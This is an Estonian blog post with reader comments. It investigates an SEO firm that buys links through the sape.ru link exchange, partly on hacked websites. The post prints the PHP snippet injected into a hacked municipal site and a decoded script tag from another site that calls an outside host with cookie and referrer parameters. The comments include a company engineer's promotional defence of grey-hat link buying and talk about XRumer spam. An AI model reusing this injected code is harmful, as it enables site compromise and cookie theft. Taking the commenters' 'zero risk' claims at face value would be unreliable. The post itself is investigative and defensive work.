optim, lingibörsid ja must SEO

Pealtnägija 26.10.2011 lugu lingibörsi abil SEO-teenust pakkuvast firmast Optim Technology väärib veidi pikemat taustaselgitust – nii sisulises kui tehnilises mõttes (mh sai tutvutud saates mainitud vallaveebi häkiga seestpoolt ja aidatud neil pättvara veebist eemaldada).

Lühike sisuline sünops on järgnev:

  • Optim Technology nimeline seltskond pakub väidetavalt oma SEO-laboris väljatöötatud lahendust aitamaks saitidel skoorida Google’is jt otsimootorites
  • Tegelikult kasutatakse selleks lingibörse (vallaveebi juhtumi puhul venelaste sape.ru) ehk teenuseid, mis võimaldavad ühel poolel paigutada veebi tekstilinkide müümise koodi ja teisel poolel neisse veebidesse linke osta
  • Lingibörsidesse on sisse ehitatud mh pidev monitooring, nt kui Google võtab linke müünud saidi oma indeksist maha peatub automaatselt reklaam/rahavoog jne – ehk kõik mänguosalised on teadlikud, et otsimootorid peavad sellist tegevust lubamatuks ning tegelevad igapäevaselt aktiivse kassi-hiire-mänguga
  • Lingibörsi kood satub veebidesse mitmel moel – leidub pisemate saitide omanikke kes kasutavad võimalust raha teenida (mh on suht mõttetu sisuga liiklust suunavate minisaitide pidamine täiesti eraldi tegevusvaldkond SEO-maailmas), on veebimeistreid kes klientide teadmata nende veebe ära kasutavad – ja lisaks on hea äri-idee häkkida massiliselt veebisaitidesse pannes need linke kuvama
  • Vaadates Optimi ja nende klientide sape.ru börsilinke paistab, et .ru puhul on tegemist peamiselt linke müüvate veebidega ja mitte-.ru puhul häkitud saitidega – muuhulgas jäi silma, et samal päeval (öösel) saates mainitud vallaveebiga on täpselt sama kood lisatud ka ühte hispaaniakeelsesse veebi ehk tegu on olnud business-as-usual häkkeriga kes tõenäoliselt hankis endale veidike FTP-paroole ja asus nende abil raha teenima (vaadates vallaveebi logisid pakun, et häkker on pärit vene/ukraina suunalt)

Pärast Pealtnägija intervjuud on Optim lisanud oma veebi tööriista mis peaks aitama leida veebilehele peidetud spämm-linke ning deklaratsiooni:

Optim Technology eksperimenteerib aktiivselt rahvusvaheliste tehnoloogiatega, mis hõlmavad ka lingibörside kasutamist. Samas soovime, et linkide müük Eesti Vabariigis toimuks 100% seaduslikel alustel. Pole midagi halba selles, kui koduleht osaleb lingibörsidel lehe omaniku soovil ning teenides omanikule lisatulu. Samuti tuleks sellisel viisil teenitud tulult maksta ka seadustega määratud maksud.

Paraku on Optim kas jätnud lugemata Google’i veebimeistritele mõeldud Quality guidelines’i (ehk nad ei jaga SEO’st ööd ega mütsi, milles ma sügavalt kahtlen) või eksitab tahtlikult oma kliente – sest vägagi selge sõnaga on seal öeldud nii:

Avoid tricks intended to improve search engine rankings. A good rule of thumb is whether you’d feel comfortable explaining what you’ve done to a website that competes with you. Another useful test is to ask, “Does this help my users? Would I do this if search engines didn’t exist?”

Don’t participate in link schemes designed to increase your site’s ranking or PageRank. In particular, avoid links to web spammers or “bad neighborhoods” on the web, as your own ranking may be affected adversely by those links.

Tegemist ei ole muideks mingi uue teemaga, näiteks jääb kiire guugeldamisega näppu Matt Cutts’i postitus aastast 2005 Text links and PageRank – ehk Google tegeleb aktiivselt sellega, et tabada müüdud linke ning vältida nende arvestamist otsitulemuste järjestamisel.

Olgu lisatud, et peidetud linkide avastamisel saab linkiv sait nipsti indeksist kinga – näiteks sattusin ma 2009-suvel mõnede Eesti saitide peale mille sappa oli neid haldav veebimeister lisanud lingid parim-ee kataloogi alamlehtedele. Palusin saidi-omanikul lisada lehele Google Webmasters Tool’i tuvastuskoodi ja sain peagi näha järgmist teadet (kuna veebimeister on vahepeal vahetunud peidan saidi nime):

Ja otseloomulikult pole Google’i poliitikas midagi erakorralist, ka kõik teised otsimootorid näevad vaeva pakkumaks “orgaanilisi” tulemusi … ja kes mõistab venet võib vaadata (arvatavasti autorikaitse eesmärgil suvaliste klipijuppidega pikitud) intervjuud Война между Яндекс и биржой ссылок sape.ru kus viimase tehnikapealik selgitab süsteemi tööd. Muideks – isegi Optimi ärimudel “arve ainult toimiva positsioneerimise eest” ei ole unikaalne vaid lingibörsi-vahenduse vallas pigem tavapärane.

Tänu tegelastele nagu sape.ru ja selliste teenuste pisivahendajatele nagu Optim saavad kasutajad otsitulemusi mis ei vii neid mitte parima kliendireputatsiooniga ettevõtte juurde vaid seltskonda keda ei häiri ebaeetiline turundus kanalites mille peamiseks kasutajaks tunduvad olema saidid stiilis asian-t33n-pr0n-com ja russian-mail-order-brides-co-uk.

Septembri algul teemaga tegeledes jäi silma näiteks selline valik Eesti ettevõtete domeene mis kasutasid sape.ru börsi teenust (samadel saitidel oli ka Optimi enda linke miska tundub, et tegemist on nimelt nende klientide ja mitte omal-käel-üritajatega): aknauksemaailm-ee, sfinksehitus-ee, kodusisu-ee, call-ee, veebiabi-ee, planb-ee, lenovo-ee, ereal-ee, kauponline-ee, uksetehas-ee, gidrocity-ee. Pealtnägija tarbeks tehtud helita kattevideo otsimisest, leidmisest ja peidetud linkidest leiab siit.

Kui leiad siit nimekirjast oma konkurendi (või lihtsalt on veidi aega üle) siis soovitan teha otsing stiilis link:uksetehas.ee ning seejärel astuda läbi Google Webmaster Tools all olevast Report paid links tööriistast (eeldab sisselogimist) ning täita vorm.

Nüüd aga tiba tehnilisemaks – kuidas siis asi käib? Hea ülevaate linkide ostmisest SAPEs annab nende enda õppevideo http://vimeo.com/23869111 ja tõepoolest, tegemist on väga vinge tööriistaga mis muuhulgas võimaldab otsida sobilikke saite lähtuvalt märksõnadest ja pagerank’ist, hallata keerulisi kampaaniad ning kontrollida ostetud linkide toimimist.

Veebimeistri jaoks on olemas õpetused kõigi tuntud sisuhalduslahenduste jaoks – reeglina PHP-kood mis suhtleb SAPE serveriga, hangib sealt värksed lingid ning siis kuvab need veebilehel sobilikus kohas. Kood sokutatakse sisuhalduses mõnda vähekäidavasse nurgatagusesse ja näiteks Lasva valla veebi puhul pöördus selle poole jupike Typo3 index.php sabas:

$sp_script = $_SERVER['DOCUMENT_ROOT'].'/fileadmin/tv-templates/template1/images/401.php';
$style="<style type=\"text/css\">\nhtm, bod {\n\tpadding: 0;\n\tmargin: 0;\n\theight: 100%;\n}\n\n";
$style.="#sp, #sp a {\n\tfont-size: 9px;\n\tcolor: #E8E8E8;\n\tborder-bottom: none;\n\tclear: both;\n}\n</style>\n\n";
while(is_integer(strpos($contents,"<a ")) && is_integer(strpos($contents,"</a>")))
{
$new_contents.=substr($contents,0,strpos($contents,"<a "));
$contents=substr($contents,strpos($contents,"<a "));
$ahref = substr($contents,0,strpos($contents,"</a>")+4);
$contents=substr($contents,strpos($contents,"</a>")+4);
if (!strpos($ahref,"href=\"http://".$_SERVER['HTTP_HOST']) && !strpos($ahref,"href=\"<a href="http://www">http://www</a>.".$_SERVER['HTTP_HOST']) && !strpos($ahref,"href='http://".$_SERVER['HTTP_HOST']) &&
!strpos($ahref,"href='<a href="http://www">http://www</a>.".$_SERVER['HTTP_HOST']) && strpos($ahref,"http"))
{ $ahref=str_replace("<a ","<noindex><a ",$ahref); $ahref=str_replace("</a>","</a></noindex>",$ahref);$ahref=str_replace("<\\/a>","<\\/a></noindex>",$ahref); }
$new_contents.= $ahref;
}
$new_contents.=$contents;
if (strpos($new_contents,"</body>") && strpos($new_contents,"</head>"))
{
$new_contents = str_replace("</head>",$style."</head>",$new_contents);
$new_contents = str_replace("charset=iso-8859-1","charset=utf-8",$new_contents);
$new_contents = str_replace("charset=ISO-8859-1","charset=UTF-8",$new_contents);
echo substr($new_contents,0,strpos($new_contents,"</body>"));
require_once($sp_script);
echo substr($new_contents,strpos($new_contents,"</body>"));
}
else { echo $new_contents; }

Nagu näha lisatakse saidi enda linkidele ühtlasi noindex vältimaks väärtusliku “lehemahla” lahjendamist mitte-börsi linkide poolt. Väga kaunis ja professionaalne :-)

Pealtnägija jaoks tehtud teises kattevideos soovitaks aga eraldi vaadata kohta mis algab ca 1:20 peal – seal on näha konkreetse lingibörsikasutaja kood ning kui seda guugeldada tuleb välja üks hispaaniakeelne sait … mis on juhtumisi saanud endale börsikoodi samal päeval Lasva veebiga ehk 08.11.2010:

Sarnast SAPE-linkide märgendust ehk <div id=’sp’> hakkas silma veel mitmes saidis, enamus neist Dreamhost’i all:

  • go.org.nz 69.163.150.4 apache2-udder.brewers.dreamhost.com
  • www.lgc.org 69.163.167.250 apache2-emu.reds.dreamhost.com
  • datingfoundry.com 69.163.185.120 apache2-linus.yaounde.dreamhost.com
  • www.sumaqperu.com 69.163.204.191 apache2-fritz.suva.dreamhost.com
  • www.gundaroobushfestival.org.au 69.163.179.108 apache2-prance.vikings.dreamhost.com
  • www.bogotabiketours.com  69.163.172.12 apache2-adamant.bulls.dreamhost.com
  • escuelasinestres.org 69.163.203.250 apache2-emu.sansalvador.dreamhost.com
  • cnuny.org 188.120.245.97 heyhosting.com
  • eutcartagena.es 212.36.82.107 fnhca-29.srv.cat

Tiba erinev tehnoloogia ehk teksti sisse pikitud lingid jäid silma saitides:

  • forestig.com
  • macyscoffee.com
  • www.punjabjustice.org

Kohvi-saidist leiab muideks keset ajalooteksti lingi veebiabi-ee peale… ja tellimise lehelt Optimi enda taanikeelse saidi promo:

 

Päris alati ei pruugi saidi häkkimine aga peidetud tekstilinkidega piirduda – sattusin peale ka sellisele saidile nagu www.campnuhop.org kus lehesabas olev kood nägi välja palju huvitavam:

See pikk liitmistehe annab tulemuseks uue koodjupi:

<script src="http://sbdtds.com/acounter.js?r=&c=&i=bc193015995f14dc4cefc81636413366a&h=campnuhop"></script>

Nagu näha (vaata kasvõi kattevideo liikuvad pilti) käivitatakse kasutaja brauseris javascript mille alla-laadimise käigus teavitatakse serverit muuhulgas kasutusel olevast brauserist… ja see c= parameeter sisaldanuks saidi cookie’t (mis võimaldaks mh tulevikus minuna sisse logida) ning r= refereri (ehk kuidas kasutaja laagri lehele tuli). Vot nii.

Kes oskab ja tahav kaevab (või kaebab) edasi, mina nüüd jälle jupp aega meedias ei esine (see siin oli lihtsalt liiga huvitav juhtum – olen nimelt mõnda aega pisteliselt peidetud linkide teemaga kokku puutunud ning aidanud veebe puhastada / turvaintsidente lahendada; lisaks mainis Mihkel Kärmas mulle teemat kohas mille veebis ma 2009-suvel esimest korda peidetud linkidega kokku puutusin … ning ma lihtsalt ei saanud jälgida oma head tava anda veidi taustainfot ja siis ajakirjanik pikalt saata; jamuideks, guugeldage veidi ja tekib tunne, et ka Optimi taga on PR- ja ajakirjandusteaduskonna lõpetanud :-).

Postitatud rubriiki cybercrime, netiturundus, spämm, turvalisus märksõnaga , , , . Talleta püsiviide. Kommenteerimine ja trackback-viidete lisamine ei ole lubatud.

36 Kommentaarid

  1. Lisatud 26. okt. 2011 kell 20:25 | Püsiviide

    Igatahes oli nauding taas su blogi lugeda Pets!

  2. Mait
    Lisatud 26. okt. 2011 kell 20:50 | Püsiviide

    Väga kihvt ja asjalik kirjatükk. Google Webmaster Tools lõigus on siiski jäänud saidi aadress sisse millel leidus lehti ”ehitustööriistadele” ja muule. Edu!

    • Lisatud 26. okt. 2011 kell 21:07 | Püsiviide

      mmm… kui mõtled parim-ee – siis selle kui lingispämmi tellija jätsin ma taotluslikult nähtavale – peidetud lingid olid hoopis muudes saitides :-) veebimeistri nimi on mulle kah teada, aga kuna tema lühinägelikkus oli piisav lisamaks linke ka SEOd väga südamesse võtva Jaak Ennuste (mitte-põhi)veebi siis ma usun, et ta on oma triibulised juba kuhjaga saanud – noh ja mina sain oma yesss!-hetke Jaagule helistades ja küsides “arva ära miks Sinu X veeb guugeldades välja ei tule”

      • Mait
        Lisatud 26. okt. 2011 kell 21:19 | Püsiviide

        pidasin silmas roosta.ee -d :)

        • Lisatud 26. okt. 2011 kell 21:37 | Püsiviide

          aihh, kurja, kolmas koht oli kah veel :-) ma lootsin, et selle väljatulemiseks kulub rohkem aega, a la kus küll võiks Pets liikuda ja Mihkliga kohtuda … ahjah, ja näe, Mihkel lausa pildi peal http://youtu.be/SnmMAza6lCc

  3. Mati Andreas
    Lisatud 26. okt. 2011 kell 21:05 | Püsiviide

    Jõudsin seda lugeda koju sõites ja vaatasin põnevusega Pealtnägijat. Optimi esindajal tuli küll korraks nutt kurku

  4. mr.Costello
    Lisatud 27. okt. 2011 kell 00:18 | Püsiviide

    Käisin ca 2 aastat tagasi Optimi korraldatud tasuta SEO koolitusel. Seal rääkisid nad küll nii Google Quality Guidlines’ist kui ka üldisemalt sellest, mida nn “mustade” meetodite kasutamine kaasa toob. Tundus aus ja siiras nii et ei tahaks uskuda, et aeti lihtsalt puru silma. Aga võimalik, et seltskond on hoopis hiljem vahetunud ja uus müügijuht (teda tollelt koolituselt ei mäleta) on suuremate kasumite teenimise nimel eetikale sülitanud. Pealtnägijas räägitud jutt küll väga pädevat muljet ei jätnud, sest ei saa ju tõsiselt võtta selle valdkonna inimest, kes räägib, et juttu stiilis “häkkimise juhtumid on väga haruldased”.

    • Aivar Optimist
      Lisatud 27. okt. 2011 kell 01:45 | Püsiviide

      Optim Technology poliitika pole sellest ajast muutunud. Koolitusel käis jutt mustadest meetoditest, mis võivad kahjustada kodulehe mainet Googlei silmis: nähtamatu teksti lisamine ja muu trikitamine Teie kodulehel.
      Hoopis teine olukord on väliste viidetega, mille puhul Google ei saa karistada kodulehe omanikku, kuna viiteid teistelt lehtedelt võib tekitada iga koolipoiss ja see ei tõesta kodulehe omaniku poolt toime pandud “rikkumist”. Google Quality Guidelines on tähtis vaid Teie kodulehe sisemiste faktorite puhul, väliste linkide eest kodulehe omanik vastutust ei kanna.Seega on olemas viis täiesti turvaliselt promoda oma kodulehte otsingus, vaatamata sellele, et tegevus on vastuolus Google’i soovitustega. Vaadake, Google ei anna Teile kunagi ametlikku instruktsiooni, kuidas tõsta koduleht TOP10 hulka selliste märksõnadega nagu “raamatupidamine” või “kinnisvara”. Enamgi veel – “valget” meetodit, mis tõstaks Teie kodulehe nende märksõnadega esikohtadele paari kuuga, ei eksisteeri. Samas on olemas täiesti turvalised “hallid” meetodid, mis garanteerivad positsioone .Kui rääkida eetikast, siis asi on tegelikult üpris keeruline. Eesti Riik on langemas rahvusvaheliste korporatsioonide mõjuvõimu alla. Eesti ajakirjanduses on viimasel ajal hoogu võtmas ohtlik tendents, et rahvusvaheliste korporatsioonide poolt sätestatud soovituste mittejärgimist on hakatud nimetama “rikkumisteks”! See on ohtlik tendents, mis võib viia selleni, et meedia hakkab varsti süüdistama kodanikke  mõne karastusjooke tootva rahvusvahelise korporatsiooni soovituste “rikkumises” või rahvusvahelise rämpstoidurestoranideketi soovituste “rikkumises”. Aitab! Eestlased on vabad inimesed! Meil kehtivad Eesti Vabariigi seadused ja Optim Technology tegutseb vastavalt nendele seadustele. Optim Technology ei pea vajalikuks järgida transnatsionaalsete korporatsioonide “soovitusi”, ainukesed kriteeriumid on teenuse efektiivsus, legaalsus ja turvalisus. P.S. Mis puudutab linkide hankimist “halbadest” kohtadest, siis on see üldine probleem internetiturunduses. Meediaskandaali raames lihtsalt nopidi välja mõningad näited tuhandete linkide hulgast. Tegemist on üldise probleemiga internetiturunduses – automatiseeritud instrumente ja suuri reklaamivõrgustikke kasutades turundajal kaob kontroll selle üle, kus tema reklaami näidatakse. Kordan veelkord, see on üldine probleem ja hõlmab mitte ainult link-buildingut, vaid internetireklaami üleüldse. Näiteks, kui Teie tellite ametlikku AdWordsi reklaami Googleilt – kas Teie saate olla kindlad selles, et reklaami ei näidata näiteks mõnel vene kommunistide lehel? Reklaamkuulutused edastatakse automaatselt üle võrgustiku ja ma võiksin tuua hulgalisi näiteid, kus EESTI firmade AdWords reklaam ilmub kahtlastel lehtedel.

  5. HillarP
    Lisatud 27. okt. 2011 kell 00:26 | Püsiviide

    Puhtalt SEO peale asju taandada on natuke liiga lihtsustatud lähenemine. Tegelikult on siin taga miljardites käibiv äri.

  6. Aivar Optimist
    Lisatud 27. okt. 2011 kell 00:33 | Püsiviide

    Lugupeetud Peeter Marvet!
    Optim Technology peainsenerina ma ei saa nõustuda Sinu süüdistustega, et meie firma “ei jaga SEO’st ööd ega mütsi”.

    Jah, meie firma ei pea vajalikuks järgida Google’i Guidlines’i. Kuid miks me peame seda üldse järgima? Linkide müük-ost on Eesti Vabariigis täiesti seaduslik. Ja Google ei saa karistada väliste viidete eest, kuna vastasel juhul oleks võimalik konkurente “uputada”.

    Peeter, kui soovid, ma võin tekitada tuhat tehnokratt.ee lehele viitavat linki ja Sa veendud ise, et Sinu kodulehe positsioone see ei kahjusta, pigem vastupidi – positsioonid tõusevad. Isegi Sinu poolt tsiteeritud Google’i väited on seotud vaid karistusega linkide müügi eest, mitte linkide ostmise eest. Optim ei paiguta mingeid linke oma klientide lehtedele, meie tekitame vaid väliseid viiteid. 

    Jah, Sa võid väita, et USAs on olemas teatud sanktsioonid linkide ostmise eest, kuid jällegi – tegemist on pigem lingimassi ajutise ignoreerimisega (sandbox filter), kui otsese karistamisega. Lokaalsetes Google’ites nagu Google.ee need filtrid puuduvad – ükskõik mis kodulehe saab linkide ostuga tõsta esimeste hulka vaid paari kuuga.
    Seega, kui kõik on seaduslik ja Google ei karista – siis why not?

    Ja isegi kui karistused eksisteeriksidki, siis Google võib teoreetiliselt nõuda ainult seda, et Sa eemaldaksid kõik rikkumised ja saadaksid lehe reconsiderationile. On ju nii? 
    Seega mängureeglid on lihtsad – igaüks võib vabalt proovida Optimi teenust, äärmisel juhul – isegi kui Google karistaks väliste linkide eest, mille ebatõenäosust ma juba tõestasin – saab kõik need lingid eemaldada ja saata leht reconsiderationile ja Google taastab lehe positsioonid? Seega reaalne risk on null! Nii et miks mitte proovida? On ju nii?

    Tegelikult, kallis Peeter, esitaks Sulle hoopis teise küsimuse. Vaata, Optim Technology on rahvusvaheline ettevõte ja meie tegutseme erinevates riikides, kus on erinev suhtumine link-building tehnoloogiatesse. Kõige konkurentsirikkam riik, kus Optim tegutseb, on Rootsi. Selles riigis on täitsa liberaalne suhtumine “lingikestesse”, loe näiteks seda (Google Translate sulle abiks): http://www.sokmotorkonsult.se/sokmotorkonsult/skola/lankstrategi/kopa-lankar
    – rootslased väidavad, et linkide ostmine on okei.
    Enamgi veel – teised rootslased kirjutavad avalikult, et eksperimenteerivad XRumer spämmiga: http://www.sokmotoroptimering.nu/experiment/spam
    Usun, et Sa nõustud, et XRumeri brutaalne spämm on nii must meetod, et isegi Optimi meetodid tunduvad võrreldes sellega täiesti valgetena?
    Antud näidete puhul pole tegemist suvaliste tegijatega, need on SEO-liidrid Rootsis.

    Ja lõpuks veel üks viide – Rootsi SEO-konkurss: http://www.sokmotoroptimering.nu/svenska-m%C3%A4sterskapen-i-seo-2011Tingimused: Black Hat võtted – lubatud! Konkurentide “uputamine” – lubatud! Loeb vaid esikoha saavutamine!Optim Technology plaanib sellest konkurssist osa võtta!!! Jeeeeee!

    Seega küsimus sulle, kallis Peeter, mida Sinua arvad rootsi turul toimuvast üleüldse ja mida Sina arvad konkreetsest SEO konkurssist “Sverigemästare i SEO 2011”?
    Ja kas Sinu arvates mõni teine EESTI internetiturundaja peale Optim Technology suudaks sellisel konkurssil läbi lüüa?
    Ja kui Optim Technology on ainuke EESTI firma, kes suudab brutaalsel rootsi turul hakkama saada,  kas siis on ilus meie firmat meedias halvustada? Või peaks meid hoopis toetama? Või mis?
    Optim Technology põhiteenuseks ongi tegelikult välisturundus – meie aitame EESTI firmadel Skaninaaviat vallutada! Ja kuidas peaks Optim seda tegema, kui Rootsi turul on linkide ostmine ja Black Hat okei teema? “Valgete” meetoditega meie ei saavuta seal midagi, kui rootslastest konkurendid teevad “bläkki”! EESTI internetiturundaja peamiseks ülesandeks on meie arvates just välisturundus. Hetkel toimuv Optimi halvustamine kohalikus meedias on üks paras konnatiigindus – selline on Optimi arvamus. 

    P.S. Optim Technology ei kasuta Black Hat võtteid! Meie võtted kuuluvad Gray Hat tehnoloogiate hulka. Terminoloogia üle võib vaielda lõpmatuseni, aga Optimi seisukoht on lihtne – Gray Hat – hallid meetodid, mis on legaalsed ja riskivabad.

    P.P.S. Elu on paradoksaalne! Olen sunnitud paralleelselt tegelema kahe asjaga: brutaalne rootsi SEO konkurss nõuab, et ma leiaksin viisi  Black Hat või misiganes meetodite abil esikoha saavutada, paralleelselt konkurente uputada ja võidelda minu lehe Black Hat uputamiskatsetega konkurentide poolt. Ja samas pean meediale aru andma Optim Technology tegevusest Eestis, mis on täiesti süütu tegevus võrreldes rootslaste XRumer spämmiga. Crazy!

    • Aske
      Lisatud 27. okt. 2011 kell 07:39 | Püsiviide

      Hea vastus Aivar. Mõned täiedused minult. Pärast seda saadet ja Peetri postitust, ma olen kindel, et ettevõtteid, kes sellest midagi ei teadnud, hakkavad sape´i kasutada). 

      Kuid üks küsimus, missugust positsiooni Google’s saavad teie kliendid, kui leping on läbi ja nad ei taha teda pikendada?)

      • Aivar Optimist
        Lisatud 27. okt. 2011 kell 17:57 | Püsiviide

        Teenusest loobumine toob kaasa linkide eemaldamise, kuna linkide eest tuleb pidevalt veebimeistritele maksta. Rendiskeemi eeliseks on see, et ainult nii saab momentaalselt tekitada suure lingimassi, mis garanteerib positsioonide saavutamise vaid ühe kuuga. Samuti võimaldab rendiskeem kiiret kohanemist uute tingimustega – Google bännis lingidoonori? Võtame sealt lingid maha ja ostame uued lingid! Google muutis algoritme? Muudame lingimassi vastavalt uutele mängureeglitele! Ükski “forever” skeem ei võimalda sellist paindlikkust ja positsioonide garantiid!

        Mis juhtub peale linkide eemaldamist? Optimil on olnud erinevaid kogemusi. Mõnikord positsioonid kukuvad kahe nädalaga -30 positsiooni allapoole. Mõnikord positsioonid püsivad TOP10 hulgas pool aastat. Üldiselt TOP5 positsioonid kaovad alati! Kuid koduleht võib püsida kuskil TOP10 viimastel kohtadel isegi ilma linkideta. Miks ta seal püsib? Vastus on lihtne:  Google analüüsib otsijate käitumist ja kui ta näeb, et koduleht on kasutajatele huvitav, siis positsioonid püsivad TOP10-TOP20 hulgas isegi ilma linkideta. 

        Otsijate käitumise analüüs on üleüldse väga huvitav teoreetiline teema. Optimil on esinenud probleeme mõningate lehtede promomisega, mis ei pakkunud kasutajatele huvi teatud märksõnadega. Nimelt Optimi poolt tekitatud lingimass tõstis kodulehed TOP10 hulka, kuid kuna kasutajad ignoreerisid seda lehte otsingutulemustes, siis positsioonid langesid. Seejärel Optim suurendas lingimassi – positsioonid tõusid, kui seejärel kukkusid, kuna leht ikka ei meeldinud kasutajatele. Järeldus: kvaliteetset kodulehte saab promoda isegi kahtlaste linkidega, ebakvaliteetse kodulehe puhul ei aita isegi superkvaliteetsed lingid.

        Google on ikka superintellektuaalne süsteem, respect selle loojatele! Google nõuab – tehnilises mõttes – et Sina promoksid just kvaliteetset kodulehte, mis oleks kasutajate jaoks huvitav! Kas Sina kasutad “valgeid”, “halle” või “musti” meetodeid – see pole nii tähtis, kui Sa promod head ja kasutajatele meeldivat lehte. Ja nii see peabki olema – isegi Optim nõustub sellise poliitika sügava tarkusega!

      • Aivar Optimist
        Lisatud 27. okt. 2011 kell 19:38 | Püsiviide

        Jep, väga halb et sape börsi mainiti meedias. Aga eks see ole tüüpiline et meedia kritiseerib ntx. narkotsi ja samas annab telefoninumbri, kust kraami tellida :) Sõnavabadus, heh!
        Igatahes, palun Peetril ja kõigil teistel piirduda sape.ru börsi mainimisega meedias ja mitte minna kaugemale.
        Eesti Internetis pole kohalik link-building veel korralikult välja arenenud ja seega Google.ee mõjutamine rahvusvahelise link-buildingu abil on ülilihtne, Eesti internetiturunduse süütu maastik on kaitsetu igasugu rahvusvaheliste ja eelkõige vene link-building tehnoloogiate ees. 

        Spetsialistina võin öelda, et rahvusvahelise link-buildingu puhul on palju varjatuid probleeme, kuid tunnistan, et 25% protsendil juhtudest suudaks iga suvaline koolipoiss saavutada TOP10 positsioone Google.ee otsingus ainult sape börsi kasutades.

        Optim Technology puhul on TOP10 positsioonide saavutamise edukus 95%. Optim kasutab lisaks sape börsile veel 8 erineva lingibörsi teenust ja  ostab sisse ka nn. “white-listide” tuge ühelt tehnoloogiapartnerilt. Meil on mitmeaastane kogemus “hallis” internetiturunduses ja koolipoistest oleme meie igal juhul kõrgematel kohtadel. Samas sape börsi avalikustamine meedias võib juba praeguse seisuga olla kahjulik mitme  “valge” internetiturundaja jaoks Eestis.

        Eriti suur palve on mitte mainida igasugu spämm-tehnoloogiaid kaamerate ees. Näiteks seesama XRumer – Black Hat spämmi tarkvara, mis ronib läbi kõiksugu kaitsete ning tekitab linke foorumites, külalisteraamatutes jne. Naljakas on see, et XRumer oli loodud Venemaal, kuid vene otsingumootor N1 Yandex suutis XRumeri spämmi edukalt välja filtreerida ja Venemaal seda tarkvara enam eriti ei kasutata. Saades kinga Venemaal, kolis XRumer Läände ja nüüd teeb pahandust Googleis. Eesti internetiturunduse süütu maastik on selle musta programmi eest kaitsetu. Võib-olla olen mina just see, kes tutvustas Peeter Marvetile siinsamas kommentaariumis seda programmi, sorry! Kuid igal juhul suur palve kaamerate ees seda tarkvara mitte mainida.

        • Aske
          Lisatud 27. okt. 2011 kell 22:17 | Püsiviide

          Arvan, et kaamerate ees oli juba palju mainitud ja mõned juba tegid accountid sapes’s. Ja üks võib tulla olukord, et kellel on rohkem raha, see on esimesel positsioonil)) 

          Xrumeri kohta väike täiendus. Isegi kui keegi ostab seda Bmasterilt 590 dollari eest ja hakkab spämmima oma veebilehte, olen kindel, et temal midagi praegusel ajal ei tule. Praegu spämmida on vaja kavalalt, et oleks kõige parem effekt. Niisugune olukord on com’is. Võib olla eestis tavaline lai spämmime veel töötab. No kurrat, forum profiilid ja guest’ed minu arust kõige low quality lingid mis võib teha) 

          • Aivar Optimist
            Lisatud 28. okt. 2011 kell 00:47 | Püsiviide

            Hehee, “mustad” optimeerijad võivad tõmmata XRumeri ka mõnelt torrent-portaalilt.

            Mina isiklikult selliseid programme ei kasuta, turundan vaid legaalsete meetodite abil.
            Kuid teoreetiliselt võib XRumer Eesti tingimustes mingi efekti siiski anda.
            Efekt võib olla väga nõrk ja analoogne nofollow linkide efektile. Paljastan saladuse – nofollow lingid töötavad, jaaaa! Kuid nofollow lingid edastavad vaid lingiteksti, mitte kaalu.
            See tähendab, et kui mingi märksõna puhul on konkurents nullilähedane, siis isegi “kaaluta” link võib tagada hea positsiooni. Konkurentsirikaste märksõnade promomisel – nagu ntx “raamatupidamine” – on “kaaluta” lingid ebaefektiivsed. Samas on Eestis paljude märksõnade puhul konkurents nullilähedane – sellistes tingimustes võivad teoreetiliselt töötada ükskõik mis lingid, nii nofollow lingid kui ka XRumeri poolt loodud lingid.

          • Aske
            Lisatud 28. okt. 2011 kell 07:23 | Püsiviide

            nffollow tegelikult töötab hästi, PR nad küll ei anna aga tõstavad otsingumootoris. Kuid praegu see PR on nii kahtlane asi…Neid on vaja natukene rohkem kui dofollow.  Asi on samuti selle, kus see nofollow link asub)) com’is nad töötavad. 

            Aga “diversification is a key”))

          • Aivar Optimist
            Lisatud 28. okt. 2011 kell 19:37 | Püsiviide

            Ok, thnx! Lasen Optimi SEO laboril mõningad eksperimendid läbi viia. Kahtlen küll, et ainuüksi nofollow linkidest ei piisa konkurentsirikaste sõnade puhul. Aga proovime, äkki tuhandete nofollow linkide abil õnnestubki saavutada TOP10 positsioonid näiteks sellise sõnaga nagu “kinnisvara”, hehee :)

    • Lisatud 27. okt. 2011 kell 09:36 | Püsiviide

      No väga tore, et sai nüüd see pool kah kenasti kirja. Tõepoolest, Google pöörab pisikestele turgudele vähem tähelepanu ja tänu sellele reostavad minu poolt kasutatavat otsimootorit igatmasti pseudoinfokataloogid jms sodi millega ingliskeelses maailmas on juba mõnevõrra suudetud tegeleda. Eks neid tuleb siis torkida.

      Aga – nagu HillarP siin kõrval mainib – ei ole mõtet kogu elu võtta SEO-keskselt. Tema mõtles selle all arvatavasti seda, et nagu Pealtnägijas ka öeldud sai olete sattunud tegelema rahvusvahelise küberkrimiäri jällemüügiga. Jõudu selles raskes töös, loodetavasti näeme ka Optimit kunagi Äripäeva IT-topis :-)

      • Aivar Optimist
        Lisatud 27. okt. 2011 kell 16:58 | Püsiviide

        Automatiseeritud instrumentide kasutamise puhul on paratamatus et mõni link hangitakse “häkitud” kohast. Optim püüab sellega võidelda, kuid 100% garantiid automatiseeritud meetodite puhul 
        anda
        ei saa. Selle puudujäägi kompenseerib Optimi teenuse meeletu efektiivsus.
        Üliselt on optim.ee lingimass tekitatud aasta-kaks tagasi. Need lingid, mida meie praegu uute klientide jaoks hangime, on sellega võrreldes palju “puhtamad”. Vaatasin just üle ühele uuele kliendile tekitatud lingimassi – enam kui 200 lingi hulgast leidsin vaid 2 kahtlast nähtamatut linki. Samas, meediaskandaali tekitamiseks piisab isegi kahest kahtlasest lingist, eks ole? :)

        • Aivar Optimist
          Lisatud 31. okt. 2011 kell 18:42 | Püsiviide

          Arusaamatuste vältimiseks lisan veel ühe kommentaari:
          Kuigi Optim nõustub, et mõni link võidakse hankida “häkitud” kohast, on absurdne süüdistada meid koostöös rahvusvahelise küberkrimiäriga. Tegemist on üleüldise turvaprobleemiga tänapäeva internetis.
          Toon lihtsa näite – USA politsei saab keskmiselt vähemalt ühe kaebuse iga tund, et Ebay.com’is müüakse varastatud kraami. Kuid see pole Ebay omaniku ega kauba ostja süü, mõlemad on vaid kuritöö ohvrid. Analoogsed probleemid võivad esineda ka näiteks Postimehele kuuluvas Soov.ee keskkonnas.
